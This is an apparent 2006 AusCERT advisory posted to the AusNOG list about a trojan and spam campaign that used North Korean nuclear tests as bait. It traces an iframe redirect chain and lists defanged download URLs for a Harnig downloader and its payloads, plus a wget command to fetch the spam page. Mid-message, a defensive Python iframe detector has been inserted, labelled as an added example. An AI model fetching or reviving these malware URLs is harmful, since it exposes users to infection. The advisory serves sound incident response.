[AusNOG] Trojan site and spam run using nuclear tests of North Korea as a hook (AUSCERT#2006ba825)
matthew at auscert.org.au
Tue Oct 17 18:25:05 EST 2006
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Greetings,
Not sure if anyone else has seen this but here it is again if so. First
seen discussed per SANS http://isc.sans.org/diary.php?date=2006-10-14
* h t t p://cnnwarnews(dot)com/
uses an iframe to go to
* h t t p://www.theaustralian.news.com.au/index/0,,5002460,00.html
which is a legit Australian news site but also uses another iframe to open
* h t t p://zagevqsoii(dot)biz/dl/adv433_.php
and this opens:
* h t t p://zagevqsoii(dot)biz/dl/loadadv433.exe
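How a defender would triage a captured copy of the redirecting page in the chain above: the checker below is an added example, not code from this post or from AusCERT. It parses HTML that has already been fetched (the sample page embedded here is constructed; only the iframe target path is taken from the post) and flags iframes that point at a host other than the page's own, or that are sized or styled to be invisible, which is the pattern of a legitimate news page carrying a hidden frame to a third-party .biz domain. The page URL and sample markup are placeholders for whatever you captured in a sandbox.

```python
"""Flag off-site and hidden <iframe> elements in a fetched HTML page.

Added example for the AusNOG post; not the post's or AusCERT's own tooling.
Input is HTML you already captured; nothing here makes network requests.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # HTMLParser lowercases attribute names; valueless attrs map to None
            self.iframes.append(dict(attrs))


# Inline styles commonly used to keep a drive-by frame out of sight
_HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def _is_hidden(attrs):
    """True if the frame is zero/one pixel in a dimension or styled invisible."""

    def tiny(value):
        return value is not None and value.strip().lower().rstrip("px").strip() in ("0", "1")

    style = attrs.get("style") or ""
    return tiny(attrs.get("width")) or tiny(attrs.get("height")) or bool(_HIDDEN_STYLE.search(style))


def suspicious_iframes(page_url, html):
    """Return [(absolute_src, [reasons...])] for iframes worth a closer look.

    An iframe is reported when its target host differs from the page's own
    host (or a subdomain of it), or when it is hidden/zero-sized.
    In production you would add an allowlist of known ad/embed hosts.
    """
    own_host = urlparse(page_url).hostname or ""
    collector = IframeCollector()
    collector.feed(html)

    findings = []
    for attrs in collector.iframes:
        src = attrs.get("src")
        if not src:
            continue
        absolute = urljoin(page_url, src)  # resolve relative srcs against the page
        host = urlparse(absolute).hostname or ""
        reasons = []
        if host != own_host and not host.endswith("." + own_host):
            reasons.append("off-site host %s" % host)
        if _is_hidden(attrs):
            reasons.append("hidden/zero-size frame")
        if reasons:
            findings.append((absolute, reasons))
    return findings


# Constructed sample: a legitimate-looking page with one benign local frame
# and one zero-size frame to the loader domain named in the post.
SAMPLE_PAGE_URL = "http://www.theaustralian.news.com.au/index/0,,5002460,00.html"
SAMPLE_HTML = """<html><body>
<h1>Top stories</h1>
<iframe src="/weather/frame.html" width="300" height="200"></iframe>
<iframe src="http://zagevqsoii.biz/dl/adv433_.php" width="0" height="0" frameborder="0"></iframe>
</body></html>"""


if __name__ == "__main__":
    for target, why in suspicious_iframes(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print(target, "->", "; ".join(why))
```

Run it against each hop of a chain (the fake news site, then the legitimate page it frames) and the off-site findings give you the next URL to fetch in the sandbox, plus a ready-made list of hosts to block or submit for takedown.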
If you google for usage of the domain you can see that it has been seeding
web forums with supposed "news" stories about North Korea that entice
victims to get infected as above:
* h t t p://www.google.com/search?q=www(dot)cnnwarnews(dot)com
* h t t p://www.google.com/search?q=au(dot)cnnwarnews(dot)com
eg: h t t p://sv.wikipedia.org/wiki/The_Forum
h t t p://www.kaigai-wedding.com/cgi-bin/wforum3/wforum.cgi?mode=new_sort
h t t p://www.depdiknas.go.id/RPP/modules.php?name=Forums&file=posting&mode=topicreview&t=1331
The articles being seeded or spammed around usually look like this:
Subject: North Korea vs Australia - nuclear stress
Prime minister of Australia John Govard claimed that "..nuclear tests of
North Korea was confirmed by seismological data", Associated Press. In
connection with increase of probability of nuclear attack from the
direction of North Korea Minister of Defence of Australia along with
Ministers of Defence of China, South Korea and Russia signed a memorandum
on infliction?
h t t p://au(dot)cnnwarnews(dot)com/topnews/
The infection process is/was the same as above. The spammed material is
still accessible via:
wget --header="Host: au(dot)cnnwarnews(dot)com" h t t p://203.116.50.253/topnews/
The original infector file, loadadv433.exe, is detected as Harnig which
grabs:
* h t t p://zbobivgcso(dot)biz/dl/loadadv455.exe
And this then grabs:
* h t t p://zagevqsoii(dot)biz/progs_exe/tdynqspzoa/ffkzyu
* h t t p://zagevqsoii(dot)biz/progs_exe/tdynqspzoa/oswzvfcm
* h t t p://zagevqsoii(dot)biz/progs_exe/tdynqspzoa/tkshrolhx.php
* h t t p://zagevqsoii(dot)biz/progs_exe/tdynqspzoa/plgrx.php
* h t t p://zagevqsoii(dot)biz/progs_exe/tdynqspzoa/rsamiscm
* h t t p://zagevqsoii(dot)biz/progs_exe/tdynqspzoa/djrhd.php
* h t t p://zagevqsoii(dot)biz/progs_exe/tdynqspzoa/gwrkgq.php
* h t t p://zagevqsoii(dot)biz/progs_exe/tdynqspzoa/mhghnoxhnv.php
* h t t p://zagevqsoii(dot)biz/progs_exe/tdynqspzoa/wipfrokuw.php
* h t t p://zagevqsoii(dot)biz/progs_exe/tdynqspzoa/idlgmwf.php
We have submitted all of these binaries to AV and sent shutdown requests
for the four key domains above. We haven't seen much discussion of this
but maybe the spam run hasn't really taken off yet. The subject of the
upcoming spam run will probably look like "North Korea vs Australia -
nuclear stress" and have the same text as the forum spams above. Credit
to F-Secure for some of their analysis on this.
Hope this is of some use.
Best regards,
- -- Matthew McGlashan --
Coordination Centre Team Leader | Hotline: +61 7 3365 4417
Australian Computer Emergency Response Team | Direct: +61 7 3365 7924
(AusCERT) | Fax: +61 7 3365 7031
The University of Queensland | WWW: www.auscert.org.au
Qld 4072 Australia | Email: auscert at auscert.org.au
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (FreeBSD)
Comment: http://www.auscert.org.au/render.html?it=1967
iQCVAwUBRTSTYCh9+71yA2DNAQIZDwP/SZQYu/hzHAutGUa+6pkQqCRAczlMoqYw
rjiCm71mfX++HCEup7IXo9NzW4rTPhCxNfM5q+qhukUZlWLd4QFah2eRk+fFtopT
Sf1POAOuWM0knjwBRWPG156bA4jytLIu+UU+M9P8hoFt4MovvQYqPljOsIpSBADe
eAgPsGrny8k=
=guYP
-----END PGP SIGNATURE-----